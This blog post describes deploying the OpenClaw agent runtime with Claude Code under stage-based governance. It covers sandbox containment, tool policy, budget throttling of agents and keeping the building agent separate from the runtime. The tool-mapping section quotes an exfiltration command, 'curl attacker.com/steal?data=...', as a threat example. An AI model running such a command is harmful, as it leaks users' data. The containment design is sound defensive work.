
Deploying an Agent Runtime with an Agent

OpenClaw is an agent runtime. It connects language models to tools that interact with real systems.

In the “OpenClaw Is Not an AI Assistant” post we described what OpenClaw is and why containment is the first concern, not an afterthought. This post describes how we actually deployed it.

The interesting part is not the deployment itself. OpenClaw installs in minutes. The interesting part is the governance system that planned, designed, and delivered the deployment. The system doing the deploying was itself an agent.

We used Claude Code, orchestrated through a work-system that enforces stage-based governance, to deploy OpenClaw from scratch.



The work-system decomposed the project into an epic, three features, and six stories. Claude Code implemented each story following TDD inside isolated worktrees. Every story passed through the same pipeline: plan, design, deliver, review, merge.

The agent that built the runtime never ran inside it. That separation is the entire point.

What the Work-System Did

The work-system is not a project tracker. It is a governance layer that enforces how work moves through stages.

Each stage has requirements. Work cannot advance without meeting them. The system assigns process templates, decomposes scope, and routes work items through urgency queues.

For the OpenClaw deployment, the work-system produced:

- Two architectural spikes before any implementation began

- One implementation plan with 15 ordered tasks across three phases

- An epic with three features and six stories, each with acceptance criteria

- Budget projections: $413/month unoptimized, $158/month target

The work-system has schemas that define what a work item looks like. It has process templates that define what each stage requires.

It has agents scoped to specific stages. The plan agent decomposes. The design agent explores options. The dev agent implements with TDD. QA validation runs inline against acceptance criteria.

The governance was structural, not conversational. Claude Code did not decide what to build next by reading a chat thread. It read work item JSON files with typed fields, checked acceptance criteria arrays, and validated outputs against defined schemas.
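To make "structural, not conversational" concrete, here is a minimal sketch of a stage gate over a work item. The field names (`acceptanceCriteria`, `status`, `evidence`) and the item ID are assumptions for illustration, not the work-system's actual schema.

```javascript
// Hypothetical work item; the shape and the ID are assumed for this sketch.
const story = {
  id: "EXAMPLE-1",
  stage: "deliver",
  acceptanceCriteria: [
    { text: "gateway healthy", status: "met", evidence: "health check output" },
    { text: "exec curl blocked inside container", status: "pending", evidence: null },
  ],
};

// Return a list of blockers; an empty list means the item may advance.
function blockersFor(item) {
  const problems = [];
  if (typeof item.id !== "string" || item.id.length === 0) {
    problems.push("id must be a non-empty string");
  }
  if (!Array.isArray(item.acceptanceCriteria) || item.acceptanceCriteria.length === 0) {
    problems.push("acceptanceCriteria must be a non-empty array");
    return problems;
  }
  for (const criterion of item.acceptanceCriteria) {
    if (criterion.status !== "met") {
      problems.push(`criterion not met: ${criterion.text}`);
    } else if (!criterion.evidence) {
      problems.push(`criterion lacks evidence: ${criterion.text}`);
    }
  }
  return problems;
}

console.log(blockersFor(story));
```

The point of the sketch is that the gate reads typed fields and returns a verdict. Nothing in it depends on interpreting a conversation.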

Two Spikes Before Any Code

Before the first story began, we ran two spikes. The first spike investigated whether the OpenClaw Gateway should run inside a Docker Sandbox or on the host. The answer was the host.

The Gateway is a persistent WebSocket daemon that manages messaging sessions, device pairing, and authentication. It needs to survive container restarts. Sandbox isolation is for tool execution, not for the control plane.

This matters because the original plan had the architecture wrong. The plan assumed the Gateway ran inside the sandbox. The spike corrected this before any implementation began.

Without the spike, Story 1.2 would have pursued the wrong containment model.

The second spike mapped every OpenClaw tool to its execution context. Some tools run inside the sandbox container. Some tools run on the host through the gateway. That distinction changes the entire security model.

Container-level tools like exec and write are dangerous if the container has network access. An agent could run curl attacker.com/steal?data=... to exfiltrate data. With network: "none", these tools are safe. The agent can only touch files in its sandboxed workspace.

Gateway-level tools like web_search and web_fetch run on the host. The agent never controls the raw HTTP request. The gateway handles the call and returns results. The agent cannot inject headers, redirect responses, or reach arbitrary endpoints.

This distinction produced the tool policy: allow container tools with no network, allow gateway-mediated tools for web access, deny messaging channels and cron by default.
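The policy above can be sketched as a small decision function. This is an illustration only: the table layout, the `messaging` and `cron` tool names, and the default-deny fallback for unknown tools are assumptions, not OpenClaw's real configuration schema.

```javascript
// Hypothetical policy table, written for this sketch.
const toolPolicy = {
  container: { tools: ["exec", "write"], requiredNetwork: "none" },
  gateway: { tools: ["web_search", "web_fetch"] },
  denied: ["messaging", "cron"],
};

// Decide whether a tool call is permitted for a container with the given network mode.
function isToolAllowed(tool, containerNetwork) {
  if (toolPolicy.denied.includes(tool)) return false;
  // Gateway-mediated tools run on the host, so the container network is irrelevant.
  if (toolPolicy.gateway.tools.includes(tool)) return true;
  // Container tools are only safe when the container has no network.
  if (toolPolicy.container.tools.includes(tool)) {
    return containerNetwork === toolPolicy.container.requiredNetwork;
  }
  return false; // assumed default: anything unlisted is denied
}

console.log(isToolAllowed("exec", "none"));
console.log(isToolAllowed("exec", "bridge"));
```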

Two spikes. Ninety minutes total. They corrected a fundamental architectural assumption and produced the security policy that governs every agent session. The implementation that followed was straightforward because the hard decisions were already made.

Three Phases of Implementation

Phase 1: Foundation

Install OpenClaw, start the Gateway daemon, enable Docker Sandbox for tool execution, configure the network denylist, and set up the tool policy. Two stories. Four hours estimated; the actual work took about 20 minutes. The acceptance criteria were specific: gateway healthy, sandbox containers active with network: "none", web_fetch works via gateway, exec curl blocked inside container.

The containment architecture that emerged:

    Host: OpenClaw Gateway (native service, port 18789)
    |-- Gateway-mediated tools (web_search, web_fetch, memory)
    |   Runs on host, returns results to agent
    |-- Agent sessions
        |-- Per-session containers (network: "none")
        |-- Tool allow/deny lists
        |-- Human approval gates

The Gateway sits outside all containment rings. Only tool execution is sandboxed. This is infrastructure saying “can’t,” not policy saying “don’t.”

Phase 2: Multi-Agent Architecture

Define four specialized agents sharing the runtime. Engineering on Opus. Research and writing on Sonnet. Operations on Haiku.

Two stories. Six hours estimated and about 20 minutes actual. Each agent gets its own workspace, its own model assignment, its own tool profile.

The engineering agent gets the coding tools. The research agent gets web access but no shell. The operations agent gets the cheapest model because its work is lightweight.

The key design decision: start restrictive, widen per-agent as trust is established. Every agent inherits the same default posture. Overrides are explicit and documented.
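One way to picture "start restrictive, widen per-agent" is a shared default profile with explicit overrides layered on top. The capability flags below are hypothetical, and the writing agent is left out because its tool profile is not described here. Only the model tiers come from the text.

```javascript
// Assumed default posture: every capability starts switched off.
const defaultProfile = Object.freeze({ shell: false, webAccess: false, fileWrite: false });

// Explicit, reviewable overrides per agent (flag names are illustrative).
const agents = {
  engineering: { model: "opus", overrides: { shell: true, fileWrite: true } },
  research: { model: "sonnet", overrides: { webAccess: true } },
  operations: { model: "haiku", overrides: {} },
};

// Merge the defaults with an agent's overrides; overrides win.
function resolveProfile(name) {
  const agent = agents[name];
  if (!agent) throw new Error(`unknown agent: ${name}`);
  return { model: agent.model, ...defaultProfile, ...agent.overrides };
}

console.log(resolveProfile("research"));
```

Because the overrides sit in one table, widening an agent's access is a visible diff and not a side effect.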

Phase 3: Token Budget and Analytics

This is the financial containment layer. Without it, four agents running on three models can spend $413 per month. With it, spending is measured, enforced, and optimized.

Two stories. Ten hours estimated. The actual work took less than an hour, longer than the earlier phases because I had to answer questions along the way. The first story built measurement and enforcement. The second built analytics reporting and cost optimization config.

The budget daemon polls agent sessions every five minutes, calculates token cost deltas against a pricing table, and appends entries to a daily JSONL ledger.
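A minimal sketch of that polling step, assuming each poll yields cumulative token counts per session. The pricing numbers are placeholders and not real vendor prices; the function and field names are hypothetical.

```javascript
// Placeholder prices in USD per million tokens. NOT real pricing.
const pricing = {
  "example-model": { inputPerMTok: 3, outputPerMTok: 15 },
};

// Cost of the tokens consumed between two polls of the same session.
function costDelta(previous, current, model) {
  const price = pricing[model];
  if (!price) throw new Error(`no pricing for model: ${model}`);
  const inputTokens = current.inputTokens - previous.inputTokens;
  const outputTokens = current.outputTokens - previous.outputTokens;
  const costUsd =
    (inputTokens * price.inputPerMTok + outputTokens * price.outputPerMTok) / 1e6;
  return { inputTokens, outputTokens, costUsd };
}

// One JSONL ledger entry: a single JSON object followed by a newline.
function ledgerLine(agent, delta, timestamp) {
  return JSON.stringify({ timestamp, agent, ...delta }) + "\n";
}

const delta = costDelta(
  { inputTokens: 0, outputTokens: 0 },
  { inputTokens: 1000000, outputTokens: 1000000 },
  "example-model"
);
process.stdout.write(ledgerLine("engineering", delta, new Date().toISOString()));
```

Appending one self-contained line per poll keeps the ledger easy to tail, and a crash mid-write leaves at most one partial final line that a reader can skip.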

Three enforcement tiers: warning at 80% of a per-agent daily limit, throttle at 100%, kill switch at $200 monthly hard cap.
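The three tiers reduce to a few comparisons. In this sketch the $200 cap is treated as a total across all agents, which is an assumption. The function name and the returned labels are also hypothetical.

```javascript
const MONTHLY_HARD_CAP_USD = 200;

// Map current spend to an enforcement action, checking the most severe tier first.
function enforcementAction(dailySpendUsd, dailyLimitUsd, monthlySpendUsd) {
  if (monthlySpendUsd >= MONTHLY_HARD_CAP_USD) return "kill";
  if (dailySpendUsd >= dailyLimitUsd) return "throttle";
  if (dailySpendUsd >= 0.8 * dailyLimitUsd) return "warn";
  return "ok";
}

console.log(enforcementAction(9, 10, 50));
```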

The throttle mechanism is worth describing. When an agent hits its daily limit, the daemon writes a flag file. For the engineering agent, that file is ~/.openclaw/budgets/throttled/engineering.flag.

Then it calls openclaw config set agents.list.1.maxConcurrent 0 to block that agent at the gateway level. Other agents continue normally.

When the daily limit resets at midnight, the daemon clears the flag file and restores routing.

The flag file is the state. The gateway config change is the enforcement. The midnight reset is the recovery. None of it requires the agent’s cooperation.

The agent does not know it has been throttled. It simply cannot start new sessions.
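The throttle and reset steps can be sketched as two small functions. The `openclaw config set` command and the flag file location come from the description above. Everything else is an assumption: the function names, the injected `runCommand` helper, and the idea that "restoring routing" means setting `maxConcurrent` back to a prior value.

```javascript
const fs = require("fs");
const path = require("path");

// `runCommand(cmd, args)` is injected so the sketch can run without the openclaw CLI.
function throttleAgent(agentName, agentIndex, budgetsDir, runCommand) {
  const flagDir = path.join(budgetsDir, "throttled");
  fs.mkdirSync(flagDir, { recursive: true });
  // The flag file is the state: its presence means "this agent is throttled".
  fs.writeFileSync(path.join(flagDir, `${agentName}.flag`), new Date().toISOString());
  // The gateway config change is the enforcement.
  runCommand("openclaw", ["config", "set", `agents.list.${agentIndex}.maxConcurrent`, "0"]);
}

// Assumed recovery step: remove the flag and restore a previous concurrency value.
function resetAgent(agentName, agentIndex, budgetsDir, runCommand, restoredConcurrency) {
  fs.rmSync(path.join(budgetsDir, "throttled", `${agentName}.flag`), { force: true });
  runCommand("openclaw", [
    "config", "set", `agents.list.${agentIndex}.maxConcurrent`, String(restoredConcurrency),
  ]);
}
```

In a real daemon, `runCommand` could wrap `child_process.execFileSync`. Keeping it injectable means the state handling can be tested without touching a live gateway.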

The analytics reporting reads the JSONL ledger and produces per-agent breakdowns: input tokens, output tokens, cost, budget percentage, and burn rate projection.

The burn rate takes the average daily cost over seven days and projects it to thirty. If engineering is spending $2.50 per day, the burn rate shows $75 per month against its $50 limit.
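The projection is simple arithmetic. A minimal sketch, with a hypothetical function name, that reproduces the $2.50 per day example:

```javascript
// Average the most recent seven daily costs and project over thirty days.
function projectMonthlyBurn(dailyCostsUsd) {
  const recent = dailyCostsUsd.slice(-7);
  if (recent.length === 0) return 0;
  const average = recent.reduce((sum, cost) => sum + cost, 0) / recent.length;
  return average * 30;
}

const projected = projectMonthlyBurn([2.5, 2.5, 2.5, 2.5, 2.5, 2.5, 2.5]);
const monthlyLimitUsd = 50;
console.log(projected, projected > monthlyLimitUsd ? "over limit" : "within limit");
// prints: 75 over limit
```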

What Claude Code Actually Did

Claude Code was the execution agent throughout. It implemented every story using TDD. Tests first, then implementation, then review.

For Phase 3 alone, the dev agent produced:

- A budget daemon (654 lines) with cost calculation, ledger management, and three-tier enforcement

- An analytics report script (434 lines) with daily and weekly aggregation

- A service registration script (177 lines) that sets up a Windows Scheduled Task with crash recovery

- Four test files totaling 1,534 lines and 64 tests, with zero failures

The work-system tracked every story through its lifecycle. Status transitions were recorded in work item JSON. Acceptance criteria were marked as met with evidence.

Pull requests were created with structured descriptions referencing the work item ID and listing all acceptance criteria as a checklist.

The PR review caught a real issue. The dev agent had written report.js directly to the deployed location but never committed it to the source repository. The tests passed because they loaded the module with require from the deployed path. On any other machine, the tests would fail immediately. The review flagged it as critical. The fix shipped before the code reached main.

That is Ring 3. Validate the outputs. The automated tests passed. The review caught what the tests could not.

The Separation

Claude Code planned, designed, and implemented the OpenClaw deployment. It wrote the budget daemon, the analytics reports, the test suites. It created branches, committed code, opened pull requests. At no point did Claude Code run inside OpenClaw.

The orchestrating agent and the deployed runtime are separate systems with separate containment boundaries. Claude Code operates under its own permission model. OpenClaw operates inside Docker Sandbox with network: "none" and tool policy enforcement.

This is not an accident. This is Ring 4 from post 4 of the main series. The agent loop cannot self-promote. The system that builds the runtime does not run inside it. The system that writes the budget daemon does not have its spending governed by the budget daemon.

If Claude Code ran inside OpenClaw, and OpenClaw’s budget daemon throttled Claude Code, the agent building the throttle system would be subject to the throttle system. (Also, I think it’s against Anthropic’s policy to run Claude Code inside OpenClaw.)

That circularity is not theoretical. It is the kind of structural failure that containment architecture exists to prevent. The separation is simple. Claude Code builds. OpenClaw runs. The human decides when to bridge them.

What Is Not Done

Two things remain, and both are operational steps, not implementation gaps. The budget daemon’s Windows Scheduled Task is not installed. The script exists and the crash recovery logic is tested. But there are no agents actively running sessions yet. Installing a monitoring daemon with nothing to monitor would be running infrastructure ahead of workload.

The prompt caching target of 70% cache hit rate is configured but not validated. Cache hit rate is a runtime metric that requires real traffic. The config structures system prompts to appear first in context for maximum cache reuse. Whether that achieves 70% depends on how the agents are actually used.

Both of these are deliberate. The containment infrastructure is complete. The deployment is waiting for workload, not for more infrastructure.

What This Proves

- The spikes exist as markdown files with timestamps and recommendations.

- The plan exists with 15 ordered tasks and their completion status.

- The epic exists with three features, six stories, and acceptance criteria arrays where every entry is marked “met.”

- The budget daemon exists as a tested Node.js script with 45 test cases. The analytics report exists with 21 test cases. The pull requests exist on GitHub with review comments and fix commits.

The framework from the main series said: constraints define the space, agents work inside it, gates verify the output, humans judge the result, the sandbox makes containment physical. This deployment followed that pattern. The work-system defined the constraints. Claude Code worked inside them. Tests and reviews verified the output. A human approved every merge. Docker Sandbox makes containment physical.

The system is not complicated. It is three artifacts, a sandbox, and the discipline to keep them separate.

Let’s talk about it.